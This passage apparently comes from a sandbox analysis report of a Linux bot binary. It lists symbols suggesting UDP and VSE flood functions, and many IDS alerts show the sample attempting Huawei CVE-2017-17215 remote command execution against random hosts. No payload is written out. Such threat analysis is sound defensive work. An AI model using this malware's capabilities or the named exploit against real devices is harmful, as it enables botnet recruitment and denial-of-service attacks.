                                                        tcpcsum.symtab0x804a707171FUNC<unknown>DEFAULT2
                                                        time.symtab0x804ef3416FUNC<unknown>DEFAULT2
                                                        time.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        times.symtab0x8052a3016FUNC<unknown>DEFAULT2
                                                        times.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        toggle_obf.symtab0x804e2ab237FUNC<unknown>DEFAULT2
                                                        toupper.symtab0x804ef4429FUNC<unknown>DEFAULT2
                                                        toupper.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        trim.symtab0x8049478183FUNC<unknown>DEFAULT2
                                                        type_codes.symtab0x8059f5824OBJECT<unknown>DEFAULT4
                                                        type_sizes.symtab0x8059f7012OBJECT<unknown>DEFAULT4
                                                        udpfl00d.symtab0x804a8301197FUNC<unknown>DEFAULT2
                                                        uname.symtab0x80568f039FUNC<unknown>DEFAULT2
                                                        uname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        unknown.1474.symtab0x8059f9c14OBJECT<unknown>DEFAULT4
                                                        unsafe_state.symtab0x805cb4020OBJECT<unknown>DEFAULT11
                                                        uppercase.symtab0x804a12851FUNC<unknown>DEFAULT2
                                                        userID.symtab0x805cad44OBJECT<unknown>DEFAULT11
                                                        usleep.symtab0x8051d4c47FUNC<unknown>DEFAULT2
                                                        usleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        util.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        util_atoi.symtab0x804e548424FUNC<unknown>DEFAULT2
                                                        util_fdgets.symtab0x804e9db129FUNC<unknown>DEFAULT2
                                                        util_isalpha.symtab0x804ea8957FUNC<unknown>DEFAULT2
                                                        util_isdigit.symtab0x804eafb45FUNC<unknown>DEFAULT2
                                                        util_isspace.symtab0x804eac257FUNC<unknown>DEFAULT2
                                                        util_isupper.symtab0x804ea5c45FUNC<unknown>DEFAULT2
                                                        util_itoa.symtab0x804e6f0253FUNC<unknown>DEFAULT2
                                                        util_local_addr.symtab0x804e92a177FUNC<unknown>DEFAULT2
                                                        util_memcpy.symtab0x804e4f747FUNC<unknown>DEFAULT2
                                                        util_memsearch.symtab0x804e7ed116FUNC<unknown>DEFAULT2
                                                        util_strcat.symtab0x804e4cb44FUNC<unknown>DEFAULT2
                                                        util_strcmp.symtab0x804e432106FUNC<unknown>DEFAULT2
                                                        util_strcpy.symtab0x804e49c47FUNC<unknown>DEFAULT2
                                                        util_stristr.symtab0x804e861201FUNC<unknown>DEFAULT2
                                                        util_strlen.symtab0x804e39840FUNC<unknown>DEFAULT2
                                                        util_strncmp.symtab0x804e3c0114FUNC<unknown>DEFAULT2
                                                        util_zero.symtab0x804e52634FUNC<unknown>DEFAULT2
                                                        vfork.symtab0x8051d7c56FUNC<unknown>DEFAULT2
                                                        vseattack.symtab0x804b6a51254FUNC<unknown>DEFAULT2
                                                        vsnprintf.symtab0x804efb8172FUNC<unknown>DEFAULT2
                                                        vsnprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        w.symtab0x8060db04OBJECT<unknown>DEFAULT12
                                                        waitpid.symtab0x80523b091FUNC<unknown>DEFAULT2
                                                        watchdog_maintain.symtab0x80492f4277FUNC<unknown>DEFAULT2
                                                        watchdog_pid.symtab0x805cd844OBJECT<unknown>DEFAULT12
                                                        wcrtomb.symtab0x8052f8463FUNC<unknown>DEFAULT2
                                                        wcrtomb.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        wcsnrtombs.symtab0x8052fe0128FUNC<unknown>DEFAULT2
                                                        wcsnrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        wcsrtombs.symtab0x8052fc427FUNC<unknown>DEFAULT2
                                                        wcsrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        wildString.symtab0x8049fb7310FUNC<unknown>DEFAULT2
                                                        write.symtab0x80522f091FUNC<unknown>DEFAULT2
                                                        x.symtab0x8060da44OBJECT<unknown>DEFAULT12
                                                        xdigits.4985.symtab0x805b04c17OBJECT<unknown>DEFAULT4
                                                        xstatconv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        y.symtab0x8060da84OBJECT<unknown>DEFAULT12
                                                        z.symtab0x8060dac4OBJECT<unknown>DEFAULT12
                                                        zprintf.symtab0x8049b0a34FUNC<unknown>DEFAULT2
                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        06/13/24-21:31:59.199967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5854237215192.168.2.1441.160.6.160
                                                        06/13/24-21:32:54.725665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4311837215192.168.2.14197.12.127.125
                                                        06/13/24-21:32:01.222534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4222637215192.168.2.1441.36.193.183
                                                        06/13/24-21:32:19.731303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5383837215192.168.2.1441.216.153.169
                                                        06/13/24-21:32:30.101027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4582637215192.168.2.1441.78.71.241
                                                        06/13/24-21:32:17.677771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4004437215192.168.2.14156.145.82.15
                                                        06/13/24-21:32:13.565737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3556437215192.168.2.14197.153.145.147
                                                        06/13/24-21:32:30.079300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922037215192.168.2.14156.43.95.98
                                                        06/13/24-21:32:21.787823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4140037215192.168.2.1441.97.48.213
                                                        06/13/24-21:32:01.238402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5970837215192.168.2.14156.8.7.247
                                                        06/13/24-21:32:30.098379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5764237215192.168.2.14156.141.120.64
                                                        06/13/24-21:33:07.057873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3901837215192.168.2.14197.85.87.182
                                                        06/13/24-21:32:13.543663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5038837215192.168.2.14197.181.173.11
                                                        06/13/24-21:32:21.801288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4223437215192.168.2.1441.89.115.71
                                                        06/13/24-21:33:13.214421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5640237215192.168.2.14197.197.208.177
                                                        06/13/24-21:32:46.523917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5646637215192.168.2.14156.91.29.168
                                                        06/13/24-21:33:15.258930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5949437215192.168.2.1441.178.246.224
                                                        06/13/24-21:33:15.271190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6008637215192.168.2.14197.170.100.127
                                                        06/13/24-21:33:13.231105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5309437215192.168.2.14156.183.36.51
                                                        06/13/24-21:32:58.840122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246637215192.168.2.14156.1.205.106
                                                        06/13/24-21:32:48.551408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4490837215192.168.2.1441.161.136.141
                                                        06/13/24-21:32:34.193123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4934637215192.168.2.1441.244.167.153
                                                        06/13/24-21:32:42.404290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4982837215192.168.2.1441.111.48.194
                                                        06/13/24-21:33:13.229487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4295037215192.168.2.14156.114.210.246
                                                        06/13/24-21:32:17.679107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442437215192.168.2.1441.158.189.188
                                                        06/13/24-21:32:36.242141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4089237215192.168.2.14197.95.239.179
                                                        06/13/24-21:33:15.276889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3481037215192.168.2.14197.193.252.60
                                                        06/13/24-21:32:42.420279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3763037215192.168.2.1441.210.56.200
                                                        06/13/24-21:32:58.820025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6099837215192.168.2.1441.116.182.29
                                                        06/13/24-21:32:07.415783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118037215192.168.2.14156.183.176.1
                                                        06/13/24-21:32:48.553662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4487637215192.168.2.1441.157.84.161
                                                        06/13/24-21:32:15.636186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4840437215192.168.2.14197.58.63.124
                                                        06/13/24-21:33:07.042942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737437215192.168.2.14197.86.11.196
                                                        06/13/24-21:32:56.791614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3379437215192.168.2.14197.202.147.94
                                                        06/13/24-21:33:04.991505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5675837215192.168.2.14197.243.77.38
                                                        06/13/24-21:33:00.885392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5499037215192.168.2.1441.147.249.8
                                                        06/13/24-21:33:07.059580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5263637215192.168.2.14197.99.236.238
                                                        06/13/24-21:33:02.909492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4140237215192.168.2.1441.134.6.75
                                                        06/13/24-21:32:32.153671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3501637215192.168.2.1441.40.20.49
                                                        06/13/24-21:32:38.320505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4908237215192.168.2.1441.253.94.175
                                                        06/13/24-21:32:11.486638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5105437215192.168.2.14197.174.100.192
                                                        06/13/24-21:32:05.346072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5105637215192.168.2.14197.162.195.141
                                                        06/13/24-21:32:34.195522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6030237215192.168.2.14197.184.135.58
                                                        06/13/24-21:32:07.403052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709237215192.168.2.14197.5.220.199
                                                        06/13/24-21:32:46.524532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3565437215192.168.2.14197.141.29.52
                                                        06/13/24-21:33:13.214131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3570237215192.168.2.14156.229.248.84
                                                        06/13/24-21:32:09.439160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4276837215192.168.2.1441.115.26.173
                                                        06/13/24-21:33:13.210379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4253037215192.168.2.14197.194.121.238
                                                        06/13/24-21:32:30.076570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838237215192.168.2.14156.96.245.240
                                                        06/13/24-21:32:40.359645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4789437215192.168.2.14197.166.149.84
                                                        06/13/24-21:32:56.758059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5549037215192.168.2.14156.158.99.231
                                                        06/13/24-21:32:21.786579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5228837215192.168.2.1441.235.18.67
                                                        06/13/24-21:32:07.404318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5920637215192.168.2.1441.9.183.41
                                                        06/13/24-21:33:05.013906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465837215192.168.2.1441.191.72.76
                                                        06/13/24-21:32:15.607713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5682837215192.168.2.14156.137.222.149
                                                        06/13/24-21:32:17.678662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5596037215192.168.2.14197.151.68.227
                                                        06/13/24-21:33:00.871560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5436837215192.168.2.1441.53.88.65
                                                        06/13/24-21:32:42.409318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4313037215192.168.2.14197.129.159.16
                                                        06/13/24-21:32:56.787702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291437215192.168.2.1441.7.7.40
                                                        06/13/24-21:32:54.708102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5474637215192.168.2.14156.233.9.146
                                                        06/13/24-21:33:13.231944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5192037215192.168.2.14197.12.44.7
                                                        06/13/24-21:33:15.254979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4111837215192.168.2.1441.81.0.62
                                                        06/13/24-21:32:32.154789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3693837215192.168.2.1441.182.109.37
                                                        06/13/24-21:32:03.278583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5902237215192.168.2.1441.208.140.157
                                                        06/13/24-21:32:50.611350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4033637215192.168.2.14197.155.88.138
                                                        06/13/24-21:33:09.106123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104437215192.168.2.14156.77.32.12
                                                        06/13/24-21:33:04.992917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4267437215192.168.2.14197.232.209.217
                                                        06/13/24-21:32:19.751864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109437215192.168.2.14197.212.181.28
                                                        06/13/24-21:32:23.833389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5019037215192.168.2.1441.85.177.222
                                                        06/13/24-21:32:50.632286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4746237215192.168.2.14197.89.148.89
                                                        06/13/24-21:31:59.176562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709637215192.168.2.14197.191.97.104
                                                        06/13/24-21:32:48.571518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336837215192.168.2.14197.178.37.169
                                                        06/13/24-21:33:07.060290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5467237215192.168.2.1441.157.109.170
                                                        06/13/24-21:32:19.749491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3387237215192.168.2.1441.29.140.219
                                                        06/13/24-21:32:19.730466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104237215192.168.2.1441.137.95.75
                                                        06/13/24-21:32:34.199109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4779237215192.168.2.14197.212.1.60
                                                        06/13/24-21:32:05.350115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5788237215192.168.2.1441.45.51.216
                                                        06/13/24-21:32:36.263595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4189837215192.168.2.14156.62.181.27
                                                        06/13/24-21:32:36.265554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5953837215192.168.2.1441.44.210.33
                                                        06/13/24-21:32:01.223979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4666437215192.168.2.14156.49.142.156
                                                        06/13/24-21:32:38.316390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5756037215192.168.2.14197.200.153.163
                                                        06/13/24-21:32:03.306455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5735837215192.168.2.14197.157.162.120
                                                        06/13/24-21:32:07.415920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3749237215192.168.2.14156.219.134.98
                                                        06/13/24-21:32:25.973929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5811837215192.168.2.1441.92.208.12
                                                        06/13/24-21:32:09.456128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4189237215192.168.2.14197.138.248.157
                                                        06/13/24-21:32:19.752957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3308437215192.168.2.14197.59.135.175
                                                        06/13/24-21:32:21.783485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5582037215192.168.2.14197.227.33.70
                                                        06/13/24-21:32:30.075040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435637215192.168.2.14197.105.110.155
                                                        06/13/24-21:32:52.654307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3497037215192.168.2.14156.57.193.244
                                                        06/13/24-21:32:30.079890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4562237215192.168.2.1441.161.152.236
                                                        06/13/24-21:32:46.524412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5014637215192.168.2.14156.97.77.181
                                                        06/13/24-21:31:59.175527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3848637215192.168.2.14156.127.173.223
                                                        06/13/24-21:32:19.749466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5854637215192.168.2.1441.210.203.218
                                                        06/13/24-21:32:03.276964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4269637215192.168.2.14156.85.224.246
                                                        06/13/24-21:33:00.871206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3709637215192.168.2.14156.142.211.184
                                                        06/13/24-21:33:07.039707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5865837215192.168.2.14197.208.6.124
                                                        06/13/24-21:32:52.657154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5509837215192.168.2.14197.137.181.44
                                                        06/13/24-21:32:05.350232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3668037215192.168.2.14197.7.222.118
                                                        06/13/24-21:32:50.630504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5772237215192.168.2.14197.196.73.146
                                                        06/13/24-21:33:02.914476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5305237215192.168.2.14197.69.115.134
                                                        06/13/24-21:32:32.151621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6000237215192.168.2.14197.140.255.176
                                                        06/13/24-21:32:01.219216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5133437215192.168.2.1441.183.243.254
                                                        06/13/24-21:32:48.553699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4426637215192.168.2.14156.151.253.58
                                                        06/13/24-21:32:38.296232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493437215192.168.2.1441.235.27.218
                                                        06/13/24-21:32:54.709043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5077237215192.168.2.1441.199.204.56
                                                        06/13/24-21:32:58.841060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5321437215192.168.2.14156.140.148.182
                                                        06/13/24-21:32:56.758539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5920837215192.168.2.1441.86.72.62
                                                        06/13/24-21:32:52.660855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5416237215192.168.2.1441.170.169.102
                                                        06/13/24-21:32:40.356560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3995437215192.168.2.1441.142.73.253
                                                        06/13/24-21:33:13.229662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4492637215192.168.2.14197.120.226.172
                                                        06/13/24-21:32:40.358470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5858037215192.168.2.14156.91.241.57
                                                        06/13/24-21:32:54.708826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4068237215192.168.2.14156.164.209.155
                                                        06/13/24-21:32:01.238840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5309437215192.168.2.1441.156.43.198
                                                        06/13/24-21:33:17.307481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5142037215192.168.2.14197.145.225.121
                                                        06/13/24-21:32:19.729354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5228037215192.168.2.14156.176.147.115
                                                        06/13/24-21:32:28.046037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4755237215192.168.2.1441.211.8.102
                                                        06/13/24-21:32:40.357793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5447437215192.168.2.14197.22.44.212
                                                        06/13/24-21:32:07.416610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316837215192.168.2.14197.185.155.98
                                                        06/13/24-21:33:00.869180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4666437215192.168.2.14156.38.0.183
                                                        06/13/24-21:32:42.406015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860437215192.168.2.14156.225.34.133
                                                        06/13/24-21:32:46.509981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4009437215192.168.2.1441.178.118.83
                                                        06/13/24-21:32:42.406731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4743637215192.168.2.14197.76.158.29
                                                        06/13/24-21:33:11.181125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3463237215192.168.2.14156.106.4.134
                                                        06/13/24-21:32:05.378305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3935037215192.168.2.1441.127.165.63
                                                        06/13/24-21:32:36.245247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4061837215192.168.2.14156.172.46.182
                                                        06/13/24-21:32:09.438263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009837215192.168.2.14197.1.96.213
                                                        06/13/24-21:32:19.748951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4937237215192.168.2.1441.217.239.2
                                                        06/13/24-21:32:44.478339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5522037215192.168.2.1441.129.125.173
                                                        06/13/24-21:32:03.273816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5431837215192.168.2.1441.108.76.82
                                                        06/13/24-21:32:05.349834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819037215192.168.2.14197.108.194.47
                                                        06/13/24-21:32:03.279433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4792637215192.168.2.14197.69.68.79
                                                        06/13/24-21:32:48.572611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5872837215192.168.2.14197.249.106.252
                                                        06/13/24-21:32:19.729661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5548437215192.168.2.14197.28.15.44
                                                        06/13/24-21:31:57.090207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5568437215192.168.2.1441.197.172.241
                                                        06/13/24-21:32:42.421733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4480637215192.168.2.1441.113.222.99
                                                        06/13/24-21:32:56.788582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3908437215192.168.2.14156.54.242.164
                                                        06/13/24-21:32:28.048393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5067437215192.168.2.1441.175.229.93
                                                        06/13/24-21:33:15.255498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5533037215192.168.2.1441.6.123.25
                                                        06/13/24-21:33:00.884925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3533437215192.168.2.14197.213.95.118
                                                        06/13/24-21:33:07.055392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3571437215192.168.2.14156.208.119.11
                                                        06/13/24-21:33:13.229112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519437215192.168.2.14197.13.212.169
                                                        06/13/24-21:32:17.671762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5096237215192.168.2.14156.126.137.78
                                                        06/13/24-21:32:13.544283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5344237215192.168.2.14156.243.55.121
                                                        06/13/24-21:32:28.027845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4621037215192.168.2.1441.13.117.197
                                                        06/13/24-21:33:00.868500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6034837215192.168.2.14156.192.100.241
                                                        06/13/24-21:32:07.404410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3954837215192.168.2.1441.229.226.225
                                                        06/13/24-21:33:17.304400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3530837215192.168.2.14197.128.30.18
                                                        06/13/24-21:32:19.730094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3791237215192.168.2.14156.18.57.1
                                                        06/13/24-21:32:23.940779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4134437215192.168.2.1441.175.93.238
                                                        06/13/24-21:32:30.100673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4061637215192.168.2.14156.165.220.188
                                                        06/13/24-21:31:59.198846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4971837215192.168.2.14197.221.63.142
                                                        06/13/24-21:32:28.043442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3897237215192.168.2.14156.105.218.239
                                                        06/13/24-21:32:11.487194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3371237215192.168.2.1441.89.95.90
                                                        06/13/24-21:32:23.832090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5397237215192.168.2.14156.231.5.1
                                                        06/13/24-21:32:05.370846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6095837215192.168.2.14197.186.85.224
                                                        06/13/24-21:32:40.376360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6004237215192.168.2.1441.101.181.25
                                                        06/13/24-21:32:54.708924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3494437215192.168.2.14156.152.160.154
                                                        06/13/24-21:32:40.373058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4409037215192.168.2.14197.198.70.156
